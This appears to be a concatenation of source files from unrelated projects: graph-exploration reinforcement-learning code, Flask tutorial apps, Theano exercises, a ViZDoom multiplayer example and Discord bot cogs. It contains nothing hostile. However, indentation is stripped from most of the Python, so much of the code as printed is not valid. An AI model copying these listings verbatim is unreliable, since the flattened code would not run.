def make_maze(width=81, height=51, complexity=.75, density=.75):
r"""Generate a random maze array.
It only contains two kind of objects, obstacle and free space. The numerical value for obstacle
is ``1`` and for free space is ``0``.
Code from https://en.wikipedia.org/wiki/Maze_generation_algorithm
>>> make_maze(10, 10)
array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]], dtype=uint8)
"""
# Only odd shapes
shape = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)
# Adjust complexity and density relative to maze size
complexity = int(complexity * (5 * (shape[0] + shape[1])))
density = int(density * ((shape[0] // 2) * (shape[1] // 2)))
# Build actual maze
Z = np.zeros(shape, dtype=bool)
# Fill borders
Z[0, :] = Z[-1, :] = 1
Z[:, 0] = Z[:, -1] = 1
# Make aisles
for i in range(density):
x, y = np.random.randint(0, shape[1] // 2 + 1) * 2, np.random.randint(0, shape[0] // 2 + 1) * 2
Z[y, x] = 1
for j in range(complexity):
neighbours = []
if x > 1: neighbours.append((y, x - 2))
if x < shape[1] - 2: neighbours.append((y, x + 2))
if y > 1: neighbours.append((y - 2, x))
if y < shape[0] - 2: neighbours.append((y + 2, x))
if len(neighbours):
y_, x_ = neighbours[np.random.randint(0, len(neighbours))]
if Z[y_, x_] == 0:
Z[y_, x_] = 1
Z[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1
x, y = x_, y_
return Z.astype(np.uint8)
def maze_to_graph(maze):
"""We use the convention that the maze cell at row y, col x
has label(x, y) = y*num_cols + x.
Equivalently, the node with label u corresponds to the
maze cell at row y, col x = label // num_cols, label % num_cols
:param maze: np.array of shape (num_rows, num_cols)
:return: nx.Graph
"""
n_rows, n_cols = maze.shape
# Find free cells
free_mask = maze == 0
# Grid has implicit naming 0, ..., N-1 \\ N, N+2, ..., 2N-1 \\ 2N, ...
# node_id = row * n_cols + col
# horizontal neighbors (first N-1 cols to last N-1 cols)
horizontal_edges_mask = np.logical_and(free_mask[:, :-1], free_mask[:, 1:]) # (N, M-1)
# nodes at (y, x) are connected to (y, x+1)
yy, xx = np.where(horizontal_edges_mask)
node_id = yy * n_cols + xx
edges = [(v, v + 1) for v in node_id]
# vertical neighbors (first N-1 rows to last N-1 rows)
vertical_edges_mask = np.logical_and(free_mask[:-1], free_mask[1:]) # (N-1, M)
# nodes at (y, x) are connected to (y+1, x)
yy, xx = np.where(vertical_edges_mask)
node_id = yy * n_cols + xx
edges.extend([(v, v + n_cols) for v in node_id])
graph = nx.from_edgelist(edges)
return graph
def maze_to_pos(maze):
n_rows, n_cols = maze.shape
yy, xx = np.where(maze == 0) # yy = row, xx = col
node_id = yy * n_cols + xx
pos = {i: (x, y) for i, y, x in zip(node_id, yy, xx)}
return pos
```
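A short usage sketch tying the three helpers together (run with the module above in scope; exact node and edge counts depend on the random maze):
```python
import numpy as np
import networkx as nx
np.random.seed(0)
maze = make_maze(width=15, height=9)
G = maze_to_graph(maze)
pos = maze_to_pos(maze)
print(maze.shape)                              # (9, 15): dimensions are forced to be odd
print(G.number_of_nodes(), G.number_of_edges(), nx.number_connected_components(G))
assert set(G.nodes) <= set(pos)                # every graph node has a grid position
```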
#### File: noge/graph_memories/base_memory.py
```python
import numpy as np
from noge.data_types import GraphObservation, PartialGraphObservation
class OnlineGraphMemory:
extra_keys = ['bf', '<KEY>']
def __init__(self, max_nodes, max_edges, max_episode_steps, pos_label=1, neg_label=0):
self.max_nodes = max_nodes
self.max_edges = max_edges
self.pos_label = pos_label
self.neg_label = neg_label
self.dim_node = None
self.num_nodes = 0
self.num_edges = 0
self.time = 0
# data
max_timesteps = min(max_nodes, max_episode_steps + 1)
self.max_timesteps = max_timesteps
self.visited_seq = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.edge_index = np.empty(shape=(2, max_edges), dtype=np.int64)
self.frontier = []
self.x = None
self.cum_path_lengths = np.empty(shape=(max_timesteps,), dtype=np.float32)
self.exploration_rates = np.empty(shape=(max_timesteps,), dtype=np.float32)
# extra data
self.store = {key: np.full(shape=(max_timesteps,), fill_value=-1, dtype=np.int64) for key in self.extra_keys}
def clear(self):
self.frontier.clear()
self.x.fill(self.neg_label)
self.num_nodes = 0
self.num_edges = 0
def update(self, partial_graph_obs: PartialGraphObservation):
# extract time step
t = partial_graph_obs['t']
new_edges = partial_graph_obs['new_edges'] # array of shape [2, ΔΜ]
new_nodes = partial_graph_obs['new_nodes']
visited_node = partial_graph_obs['visited_node']
cost = partial_graph_obs['path_cost']
# reset and update frontier
if t == 0:
self.clear()
self.frontier.extend(new_nodes)
self.frontier.remove(visited_node)
self.cum_path_lengths[t] = cost # 0
# self.exploration_rates[t] = 0
else:
self.frontier.remove(visited_node)
self.frontier.extend(new_nodes)
self.cum_path_lengths[t] = cost + self.cum_path_lengths[t-1]
# self.exploration_rates[t] = t / self.cum_path_lengths[t]
# update node and edge counts
self.num_nodes += len(new_nodes)
# update edges
m_old = self.num_edges
m_new = m_old + new_edges.shape[1]
self.edge_index[:, m_old:m_new] = new_edges
self.num_edges = m_new
# update visited sequence
self.visited_seq[t] = visited_node
# update nn, bf, df
for key in self.extra_keys:
self.store[key][t] = partial_graph_obs[key]
# update time
self.time = t
def get(self) -> GraphObservation:
# retrieve graph state at time t
t = self.time
n = self.num_nodes
m = self.num_edges
obs = GraphObservation(x=self.x[:n],
edge_index=self.edge_index[:, :m],
frontier=np.array(self.frontier),
visited_seq=self.visited_seq[:t+1]
)
return obs
def get_frontier(self):
return self.frontier
class OfflineGraphMemory:
extra_keys = ['<KEY>']
def __init__(self, max_nodes, max_edges, max_episode_steps, pos_label=1, neg_label=0):
self.max_nodes = max_nodes
self.max_edges = max_edges
self.pos_label = pos_label
self.neg_label = neg_label
self.dim_node = None
# data
max_timesteps = min(max_nodes, max_episode_steps + 1)
self.max_timesteps = max_timesteps
self.visited_seq = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.edge_index = np.empty(shape=(2, max_edges), dtype=np.int64)
# time -> counts for reconstructing history
self.node_counts = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.edge_counts = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.cum_path_lengths = np.empty(shape=(max_timesteps,), dtype=np.float32)
self.exploration_rates = np.empty(shape=(max_timesteps,), dtype=np.float32)
# node -> time step for reconstructing history (each node is discovered once and visited once)
self.discovery_times = np.full(shape=(max_nodes,), fill_value=max_timesteps + 1, dtype=np.int64)
self.visit_times = np.full(shape=(max_nodes,), fill_value=max_timesteps + 1, dtype=np.int64)
# extra data
self.store = {key: np.full(shape=(max_timesteps,), fill_value=-1, dtype=np.int64) for key in self.extra_keys}
def update(self, partial_graph_obs: PartialGraphObservation):
# extract time step
t = partial_graph_obs['t']
new_edges = partial_graph_obs['new_edges'] # array of shape [2, ΔΜ]
discovered_nodes = partial_graph_obs['new_nodes']
visited_node = partial_graph_obs['visited_node']
cost = partial_graph_obs['path_cost']
if t == 0:
n_old = 0
m_old = 0
self.cum_path_lengths[t] = cost
# self.exploration_rates[t] = 0
else:
n_old = self.node_counts[t-1]
m_old = self.edge_counts[t-1]
self.cum_path_lengths[t] = cost + self.cum_path_lengths[t-1]
# self.exploration_rates[t] = t / self.cum_path_lengths[t]
n_new = n_old + len(discovered_nodes)
m_new = m_old + new_edges.shape[1]
# update counts history
self.edge_counts[t] = m_new
self.node_counts[t] = n_new
# update edges
self.edge_index[:, m_old:m_new] = new_edges
# update visited sequence
self.visited_seq[t] = visited_node
# update nn, bf, df
for key in self.extra_keys:
self.store[key][t] = partial_graph_obs[key]
# update times
self.discovery_times[discovered_nodes] = t # time step the nodes were discovered
self.visit_times[visited_node] = t # time step the nodes were visited
def sample(self, t: int) -> GraphObservation:
raise NotImplementedError
```
#### File: noge/graph_memories/categorical.py
```python
import numpy as np
from noge.data_types import GoalPartialObservation, GraphObservation
from .base_memory import OnlineGraphMemory, OfflineGraphMemory
class CategoricalOnlineMemory(OnlineGraphMemory):
""" Maintain a node features array that is incrementally updated (no copy) """
def __init__(self, max_nodes, max_edges, max_episode_steps, history, features, pos_label, neg_label):
super().__init__(max_nodes, max_edges, max_episode_steps, pos_label, neg_label)
self.history = history
self.cat_features = features
# features 'CYF' + cat_features = {B, D, N}
self.feat_flags = {key: flag in features for flag, key in zip("BDN", self.extra_keys)}
self.num_features = 3 + sum(self.feat_flags.values())
self._last_path_nodes = None
self.dim_node = history * self.num_features
self.x = np.full(shape=(max_nodes, self.dim_node), fill_value=self.neg_label, dtype=np.float32)
self.offsets = list(range(0, self.dim_node, history))
def update(self, partial_graph_obs: GoalPartialObservation):
n_old = self.num_nodes
super().update(partial_graph_obs)
n_new = self.num_nodes
visited_node = partial_graph_obs['visited_node']
# update node features in place
pos = self.pos_label
neg = self.neg_label
x = self.x
t = self.time
d = self.num_features
D = self.dim_node # D = d * h
# for the previously known nodes, shift all features 1 position to the left
dims_past = D - d
x[:n_old, :dims_past] = x[:n_old, d:]
# in the present, the changes are:
# C Y F B D N
# C: visited node is now in the visited set
col = dims_past
if t > 0:
previous_node = self.visited_seq[t - 1]
x[previous_node, col] = pos
if 'X' not in self.cat_features:
x[visited_node, col] = pos
# Y: visited node is current, previous node is not current
col += 1
if t > 0:
previous_node = self.visited_seq[t-1]
x[previous_node, col] = neg
x[visited_node, col] = pos
# F: visited node is no longer in the frontier, new nodes are
col += 1
x[n_old:n_new, col] = pos
x[visited_node, col] = neg
# BDN
for key in self.extra_keys:
if self.feat_flags[key]:
arr = self.store[key]
col += 1
if t > 0:
previous_node = arr[t-1]
x[previous_node, col] = neg
current_node = arr[t]
if current_node >= 0: # -1 means None
x[current_node, col] = pos
class CategoricalOfflineMemory(OfflineGraphMemory):
"""Maintain events history, so that graph state of any time step can be reconstructed"""
def __init__(self, max_nodes, max_edges, max_episode_steps, history, features, pos_label, neg_label):
super().__init__(max_nodes, max_edges, max_episode_steps, pos_label, neg_label)
self.history = history
self.cat_features = features
# features 'CYF' + cat_features = {B, D, N}
self.feat_flags = {key: flag in features for flag, key in zip("BDN", self.extra_keys)}
self.num_features = 3 + sum(self.feat_flags.values())
self.list_of_path_nodes = [None] * (max_episode_steps + 1)
self.dim_node = history * self.num_features
def update(self, partial_graph_obs: GoalPartialObservation):
super().update(partial_graph_obs)
def sample(self, t: int) -> GraphObservation:
# retrieve graph state at time t
m = self.edge_counts[t]
n = self.node_counts[t]
discovery_times = self.discovery_times[:n]
visit_times = self.visit_times[:n]
# get nodes discovered time step
discovery_times = discovery_times.reshape(n, 1)
# get nodes visited time step
visitation_times = visit_times.reshape(n, 1)
# update node features in place
pos = self.pos_label
neg = self.neg_label
h = self.history
d = self.num_features
D = self.dim_node # D = d * h
# time steps
timesteps = np.arange(t-h+1, t+1) # [t-3, t-2, t-1, t] for h=4
# discovered feature (v in U)
discovered_mask = discovery_times <= timesteps # [N, H]
# visited feature (v in C)
visited_mask = visitation_times <= timesteps # [N, H]
# frontier feature (v in F) = discovered but not (yet) visited
frontier_mask = discovered_mask & ~visited_mask # [N, H]
# current feature (v == v_t)
# current_mask = visitation_times == timesteps # [N, H]
# F C Y B D N
x = np.full(shape=(n, D), fill_value=neg, dtype=np.float32)
for j in range(h):
timestep = t-h+1+j
if timestep >= 0:
# C: visited set
col = j * d # [0, d, 2d]
M = visited_mask[:, j]
x[M, col] = pos
# Y: current node
col += 1
# M = current_mask[:, j]
v = self.visited_seq[timestep]
x[v, col] = pos
if 'X' in self.cat_features:
x[v, col-1] = neg
# F: frontier set
col += 1
M = frontier_mask[:, j]
x[M, col] = pos
# BDN
for key in self.extra_keys:
if self.feat_flags[key]:
arr = self.store[key]
col += 1
current_node = arr[timestep]
if current_node >= 0: # -1 means None
x[current_node, col] = pos
# frontier
frontier = np.where(frontier_mask[:, -1])[0]
obs = GraphObservation(x=x,
edge_index=self.edge_index[:, :m],
frontier=frontier,
visited_seq=self.visited_seq[:t+1]
)
return obs
```
#### File: noge/policies/q_policy.py
```python
import torch
import numpy as np
from noge.data_types import GoalPartialObservation, NeuralGraphObservation, InferenceSample
class GraphDQNPolicy:
def __init__(self, network, graph_memory, preprocessor, exploration_schedule=None, device='cpu'):
self.network = network
self.graph_memory = graph_memory
self.preprocessor = preprocessor
self.exploration_schedule = exploration_schedule
self.device = device
self._is_collecting = exploration_schedule is not None
def __call__(self, partial_obs: GoalPartialObservation) -> int:
# EnvObservation (PartialGraphObservation) -> GraphObservation
self.graph_memory.update(partial_obs)
frontier = self.graph_memory.get_frontier()
frontier_size = len(frontier)
# if there is only a single option, we don't need to forward pass
if frontier_size == 1:
return frontier[0]
# if it is the first time step, all options should be equally likely
t = partial_obs['t']
if t == 0:
i = np.random.randint(frontier_size)
return frontier[i]
# exploration: only for behavioral policy (collection phase)
if self._is_collecting:
u = np.random.rand()
if u < self.exploration_schedule.current:
i = np.random.randint(frontier_size)
return frontier[i]
# (epsilon < u) or this is an inference policy (evaluation phase)
# graph
graph_obs = self.graph_memory.get()
torch_graph_obs = {k: torch.from_numpy(v).to(self.device) for k, v in graph_obs.items()}
neural_graph_obs = NeuralGraphObservation(**torch_graph_obs)
# measurement
encoded_meas = self.preprocessor.transform_meas(partial_obs['meas'])
# network input
net_input = InferenceSample(graph_obs=neural_graph_obs, meas=encoded_meas, goal=None)
# forward pass
with torch.no_grad():
q = self.network(net_input) # [A, 1]
# DFP policy
frontier_node_index = q.argmax().item() # a
# map index to frontier nodes
node = frontier[frontier_node_index]
return node
```
#### File: noge/trainers/dfp_trainer.py
```python
import torch
import numpy as np
from noge.data_types import DFPReplayBatch, DFPTrainingBatch, Transition
from noge.trainers.base_trainer import Trainer
from noge.trainers.replay_buffer import Replay
class DFPReplay(Replay):
def __init__(self, capacity, ob_space, graph_mem_config, future_steps, min_horizon=4):
super().__init__(capacity, ob_space, graph_mem_config, min_horizon)
assert 'goal' in ob_space.spaces
self.future_steps = future_steps
# make normal numpy arrays for measurements and goals
goal_space = ob_space.spaces['goal']
self._goals = np.empty(shape=(capacity, *goal_space.shape), dtype=goal_space.dtype)
def push(self, transition: Transition):
obs = transition.obs
# push goal before calling superclass to get the right 'pointer'
self._goals[self._pointer] = obs['goal']
if transition.terminal:
next_pointer = (self._pointer + 1) % self.capacity
self._goals[next_pointer] = transition.next_obs['goal']
super().push(transition)
def sample(self, batch_size: int) -> DFPReplayBatch:
valid_idx = self._sample_valid_indices(batch_size)
# retrieve / copy from storage
graph_obses = self._graphs_buffer.get(valid_idx)
measurements = self._measurements[valid_idx] # [B, M, Dm]
goals = self._goals[valid_idx]
actions = self._actions[valid_idx]
# make targets
targets, targets_mask = self._make_targets(valid_idx)
# make replay batch according to data protocol
sample_batch = DFPReplayBatch(graph_obses=graph_obses,
measurements=measurements,
goals=goals,
actions=actions,
targets=targets,
targets_mask=targets_mask)
return sample_batch
def _make_targets(self, indices: np.ndarray):
# sample measurements
measurements = self._measurements # [N, Dm]
meas_t = measurements[indices] # [B, Dm]
meas_t = np.expand_dims(meas_t, 1) # [B, 1, Dm]
# get future measurements at t + dt
future_times = indices.reshape(-1, 1) + self.future_steps
future_times = future_times % self.capacity # [B, T]
future_meas = measurements[future_times] # [B, T, Dm]
# mark future measurements as invalid if they are from a different episode
episode_idx = self._episode_idx[indices].reshape(-1, 1) # [B, 1]
future_episode_idx = self._episode_idx[future_times] # [B, T]
valid_times_mask = future_episode_idx == episode_idx # [B, T]
# make targets: y = m_{t+dt} - m_t
targets = future_meas - meas_t # [B, T, Dm]
# reshape targets mask [B, T] --> [B, T, Dm]
B, T, D = targets.shape
targets_mask = valid_times_mask.reshape(B, T, 1) # [B, T, 1]
targets_mask = np.tile(targets_mask, (1, 1, D)) # [B, T, Dm]
return targets, targets_mask
class DFPTrainer(Trainer):
def preprocess_batch(self, batch: DFPReplayBatch) -> DFPTrainingBatch:
# preprocess list of dicts
graph_obses = [self.graph_obs_fn(graph_obs) for graph_obs in batch.graph_obses]
# most arrays can be directly moved to torch
measurements = self.preprocessor.transform_meas(batch.measurements)
goals = torch.from_numpy(batch.goals).to(self.device)
actions = torch.from_numpy(batch.actions).to(self.device)
# targets can be rescaled
targets, targets_mask = self.preprocessor.transform_target(batch.targets, batch.targets_mask)
# make training batch as defined in data protocol
train_batch = DFPTrainingBatch(graph_obses=graph_obses,
measurements=measurements,
goals=goals,
actions=actions,
targets=targets,
targets_mask=targets_mask)
return train_batch
def step(self, batch_size=None):
B = batch_size or self.batch_size
replay_batch: DFPReplayBatch = self.replay_buffer.sample(B)
train_batch: DFPTrainingBatch = self.preprocess_batch(replay_batch)
self.network.train()
predictions = self.network(train_batch) # [B, D_goal]
targets = train_batch.targets # [B, T=D_goal]
target_masks = train_batch.targets_mask # [B, T=D_goal]
num_targets = targets.numel()
num_valid_targets = target_masks.sum().item()
# compute loss
loss = self.criterion(predictions, targets, target_masks)
# do gradient step
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if self.scheduler is not None:
self.scheduler.step()
loss_sum = loss.item()
full_loss = loss_sum / num_targets
valid_loss = loss_sum / num_valid_targets
# log stats
d = dict(pred_loss=full_loss, valid_pred_loss=valid_loss)
self.train_metrics.append(d)
self.num_train_steps += 1
```
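The heart of `_make_targets` above is the difference between future and current measurements, masked by episode membership; a standalone numpy illustration with toy sizes (independent of the replay buffer internals):
```python
import numpy as np
measurements = np.arange(6, dtype=np.float32).reshape(6, 1)  # m_t = t, 1-D measurements
episode_idx = np.array([0, 0, 0, 1, 1, 1])                   # two episodes of length 3
future_steps = np.array([1, 3])                              # temporal offsets dt
indices = np.array([1, 4])                                   # sampled time steps
future_times = (indices.reshape(-1, 1) + future_steps) % len(measurements)
targets = measurements[future_times] - measurements[indices][:, None]  # m_{t+dt} - m_t
valid = episode_idx[future_times] == episode_idx[indices].reshape(-1, 1)
print(targets.squeeze(-1))  # [[ 1.  3.] [ 1. -3.]]
print(valid)                # [[ True False] [ True False]] -- cross-episode offsets get masked
```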
#### File: noge/trainers/dqn_trainer.py
```python
import torch
import copy
from noge.data_types import ReplayBatch, TrainingBatch, InferenceSample
from noge.trainers.base_trainer import Trainer
class DQNTrainer(Trainer):
def __init__(self, gamma, target_update_freq, replay_buffer, batch_size, network, preprocessor,
criterion, optimizer, scheduler=None, device='cpu'):
super().__init__(replay_buffer, batch_size, network, preprocessor, criterion, optimizer, scheduler, device)
self.gamma = gamma
self.target_update_freq = target_update_freq
self.target_net = copy.deepcopy(network).to(self.device)
self.target_net.eval()
def preprocess_batch(self, batch: ReplayBatch) -> TrainingBatch:
# preprocess list of dicts
graph_obses = [self.graph_obs_fn(graph_obs) for graph_obs in batch.graph_obses]
next_graph_obses = [self.graph_obs_fn(graph_obs) for graph_obs in batch.next_graph_obses]
# most arrays can be directly moved to torch
measurements = self.preprocessor.transform_meas(batch.measurements)
next_measurements = self.preprocessor.transform_meas(batch.next_measurements)
actions = torch.from_numpy(batch.actions).to(self.device)
rewards = torch.from_numpy(batch.rewards).to(self.device)
mask = torch.from_numpy(batch.mask).to(self.device)
# make training batch as defined in data protocol
train_batch = TrainingBatch(graph_obses=graph_obses,
measurements=measurements,
actions=actions,
rewards=rewards,
next_graph_obses=next_graph_obses,
next_measurements=next_measurements,
goals=None,
mask=mask)
return train_batch
def step(self, batch_size=None):
B = batch_size or self.batch_size
replay_batch: ReplayBatch = self.replay_buffer.sample(B)
train_batch: TrainingBatch = self.preprocess_batch(replay_batch)
self.network.train()
q_sa = self.network(train_batch) # [B, 1]
q_next = []
with torch.no_grad():
for go, meas in zip(train_batch.next_graph_obses, train_batch.next_measurements):
sample = InferenceSample(graph_obs=go, meas=meas.unsqueeze(0), goal=None)
q_next_i = self.target_net(sample) # [N_i, 1]
q_next.append(q_next_i.max(0)[0])
q_next = torch.cat(q_next) # [B,]
q_next = train_batch.mask * q_next # [B,]
q_target = train_batch.rewards + self.gamma * q_next # [B,]
loss = self.criterion(q_sa, q_target.reshape(B, 1))
# do gradient step
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if self.scheduler is not None:
self.scheduler.step()
# log stats
self.train_metrics.append(dict(q_loss=loss.item()))
self.num_train_steps += 1
if self.num_train_steps % self.target_update_freq == 0:
self.target_net.load_state_dict(self.network.state_dict())
``` |
{
"source": "JohnyCook12/Flask_example",
"score": 3
} |
#### File: JohnyCook12/Flask_example/api.py
```python
from flask import Flask, url_for, render_template, request, jsonify
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
def get(self):
return {'about':"Hello World introduction"}
def post(self):
some_json = request.get_json()
return {'You send': some_json}, 201
class Multiply10(Resource):
def get(self, num):
return {'vysledek': num*10}
api.add_resource(HelloWorld,'/')
api.add_resource(Multiply10,'/multi/<int:num>')
# ========================== RUN ======================
if __name__ == '__main__':
app.run(debug=True)
```
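A quick check of the API above with Flask's test client (assumes the module is saved as api.py and flask_restful is installed; no server needs to run):
```python
from api import app
client = app.test_client()
print(client.get('/').get_json())                  # {'about': 'Hello World introduction'}
print(client.post('/', json={'x': 1}).get_json())  # {'You send': {'x': 1}}
print(client.get('/multi/7').get_json())           # {'vysledek': 70}  ('vysledek' = 'result' in Czech)
```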
#### File: JohnyCook12/Flask_example/hello.py
```python
from flask import Flask, url_for, render_template
app = Flask(__name__)  # the Flask app object to run; __name__ resolves to this module's (file's) name
print(__name__)
@app.route('/') # url of index.
def index():
    return f'Hello from Flask!.....URL for index: {url_for("pers")}'
my_age = 32
@app.route('/osobni') # route 1
@app.route('/personal/') # route 2 (for same page)
@app.route('/pers_info') # route 3
def pers():
return f'Hello! Name: Johny, city: Prague, Age: {my_age}'
### DYNAMIC ROUTES ###
username = 'Johny' # DYNAMIC ROUTEs:
@app.route(f'/user/<username>/') # var in format <variable>
def profile(username):
return f'This is infopage about user {username}:'
@app.route('/url/') # GENERATE URL
def show_url():
return url_for('profile', username='hroncok') # First arg = name of function that generate dynamic route. Second arg = argument required in d. route.
@app.route('/defaultni_url/')
def make_url():
    return url_for('pers')
### TEMPLATES ###
@app.route('/hello/')
@app.route('/hello/<name>/')
def hello(name=None):
return render_template('hello.html', name=name) # loads from TEMPLATES folder
@app.route('/bububu/')
def bububu():
return render_template('bubu.html') # loads from TEMPLATES folder
@app.route('/hlavni/')
def hlavni_page():
return render_template('hlavni_stranka.html')
# ========================== RUN ======================
if __name__ == '__main__':
app.run(debug=True)
```
#### File: JohnyCook12/Flask_example/recognize_sound.py
```python
from flask import Flask, url_for, render_template, request, redirect
import speech_recognition as sr
app = Flask(__name__)
@app.route('/speech/', methods=["GET", "POST"]) # speech recognition
def speech_page():
try:
if request.method == "POST": # some file uploaded
print("FORM DATA RECEIVED")
if "my_file" not in request.files: # NO FILE uploaded
return redirect(request.url)
file = request.files["my_file"]
if file.filename == "": # FILE BLANK
return redirect(request.url)
if file: # PROCESSING the file
try:
recognizer = sr.Recognizer() # create Recognizer instance
audio_file = sr.AudioFile(file) # convert file to audio
with audio_file as source:
data = recognizer.record(source)
result_text = recognizer.recognize_google(data, key=None, language="cs") # recognize text
print(result_text)
return render_template('speech.html', content=result_text, result_content=result_text)
except Exception:
return render_template('speech.html', result_content="No file")
else:
return render_template('speech.html') # this is return when method is GET
except Exception: # Any error
return render_template('speech.html', result_content="something is missing")
# ========================== RUN ======================
if __name__ == '__main__':
app.run(debug=True, threaded=True)
``` |
{
"source": "johny-c/theano_exercises",
"score": 3
} |
#### File: 01_basics/01_building_expressions/02_vector_mat_soln.py
```python
import numpy as np
from theano import function
import theano.tensor as T
def make_vector():
"""
Returns a new Theano vector.
"""
return T.vector()
def make_matrix():
"""
Returns a new Theano matrix.
"""
return T.matrix()
def elemwise_mul(a, b):
"""
a: A theano matrix
b: A theano matrix
Returns the elementwise product of a and b
"""
return a * b
def matrix_vector_mul(a, b):
"""
a: A theano matrix
b: A theano vector
Returns the matrix-vector product of a and b
"""
return T.dot(a, b)
if __name__ == "__main__":
a = make_vector()
b = make_vector()
c = elemwise_mul(a, b)
d = make_matrix()
e = matrix_vector_mul(d, c)
f = function([a, b, d], e)
rng = np.random.RandomState([1, 2, 3])
a_value = rng.randn(5).astype(a.dtype)
b_value = rng.rand(5).astype(b.dtype)
c_value = a_value * b_value
d_value = rng.randn(5, 5).astype(d.dtype)
expected = np.dot(d_value, c_value)
actual = f(a_value, b_value, d_value)
assert np.allclose(actual, expected)
print "SUCCESS!"
```
#### File: 01_basics/02_compiling_and_running/02_shared.py
```python
import numpy as np
raise NotImplementedError("TODO: add any other imports you need")
def make_shared(shape):
"""
Returns a theano shared variable containing a tensor of the specified
shape.
You can use any value you want.
"""
raise NotImplementedError("TODO: implement the function")
def exchange_shared(a, b):
"""
a: a theano shared variable
b: a theano shared variable
Uses get_value and set_value to swap the values stored in a and b
"""
raise NotImplementedError("TODO: implement the function")
def make_exchange_func(a, b):
"""
a: a theano shared variable
b: a theano shared variable
Returns f
where f is a theano function, that, when called, swaps the
values in a and b
f should not return anything
"""
raise NotImplementedError("TODO: implement the function")
if __name__ == "__main__":
a = make_shared((5, 4, 3))
assert a.get_value().shape == (5, 4, 3)
b = make_shared((5, 4, 3))
assert a.get_value().shape == (5, 4, 3)
a.set_value(np.zeros((5, 4, 3), dtype=a.dtype))
b.set_value(np.ones((5, 4, 3), dtype=b.dtype))
exchange_shared(a, b)
assert np.all(a.get_value() == 1.)
assert np.all(b.get_value() == 0.)
f = make_exchange_func(a, b)
rval = f()
assert isinstance(rval, list)
assert len(rval) == 0
assert np.all(a.get_value() == 0.)
assert np.all(b.get_value() == 1.)
print "SUCCESS!"
``` |
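The file above is an exercise skeleton; one possible solution sketch (kept separate so the skeleton stays intact) uses `theano.shared` plus a function whose updates swap the two values simultaneously:
```python
import numpy as np
import theano
def make_shared(shape):
    return theano.shared(np.zeros(shape))
def exchange_shared(a, b):
    tmp = a.get_value()
    a.set_value(b.get_value())
    b.set_value(tmp)
def make_exchange_func(a, b):
    # both updates are computed from the old values, so a and b are swapped
    return theano.function([], updates=[(a, b), (b, a)])
```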
{
"source": "johny-c/ViZDoom",
"score": 3
} |
#### File: examples/python/multiple_instances.py
```python
from __future__ import print_function
from random import choice
from vizdoom import *
# For multiplayer game use process (ZDoom's multiplayer sync mechanism prevents threads to work as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Run this many episodes
episodes = 10
def player1():
game = DoomGame()
# game.load_config('../../scenarios/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 1 +sv_spawnfarthest 1")
game.add_game_args("+name Player1 +colorset 0")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Episode finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player2():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
# p1 = Thread(target = player1)
# p1.start()
if __name__ == '__main__':
p1 = Process(target=player1)
p1.start()
player2()
print("Done")
``` |
{
"source": "johnydough/Discord-Bot",
"score": 3
} |
#### File: Discord-Bot/cogs/jokes.py
```python
import discord
from discord.ext import commands
import pyjokes
class Jokes(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(brief="tells a joke", description="tells a joke")
async def joke(self, ctx):
await ctx.send(pyjokes.get_joke())
def setup(bot):
bot.add_cog(Jokes(bot))
```
#### File: Discord-Bot/cogs/scramble.py
```python
import discord
from discord.ext import commands
import random
import asyncio
from media.drawings import *
class Scramble(commands.Cog):
def __init__(self, bot):
self.bot = bot
def get_word(self):
lines = open("media/word_list").readlines()
word = random.choice(lines)
word = word[:-1]
print(word)
return word
@commands.command(aliases=['scrmble', 'scrm', 'scrim', 'scram', 'scramb', 'scrambl', 'scr', 'scrabble'], description= "scramble game")
async def scramble(self, ctx):
word = self.get_word()
shuffled = ''.join(random.sample(word, len(word)))
blanks = ''
for i in range(len(shuffled)):
blanks += '_ '
board = await ctx.send(f"Click the inbox to attempt the entire word\n```Letters left: {' '.join(shuffled)}\n{blanks}```")
message_reactions = []
reaction_to_word = ""
for i in shuffled:
await board.add_reaction(DICT_ALPHABET[i])
message_reactions.append(DICT_ALPHABET[i])
await board.add_reaction(BACK_EMOJI)
await board.add_reaction(STOP_EMOJI)
await board.add_reaction(WORD_EMOJI)
message_reactions.append(BACK_EMOJI)
message_reactions.append(STOP_EMOJI)
message_reactions.append(WORD_EMOJI)
not_finished = True
not_wrong_guess = True
self.bot.loop.create_task(self.scramble_loop(ctx, word, not_finished, message_reactions, reaction_to_word, blanks, board, shuffled, not_wrong_guess))
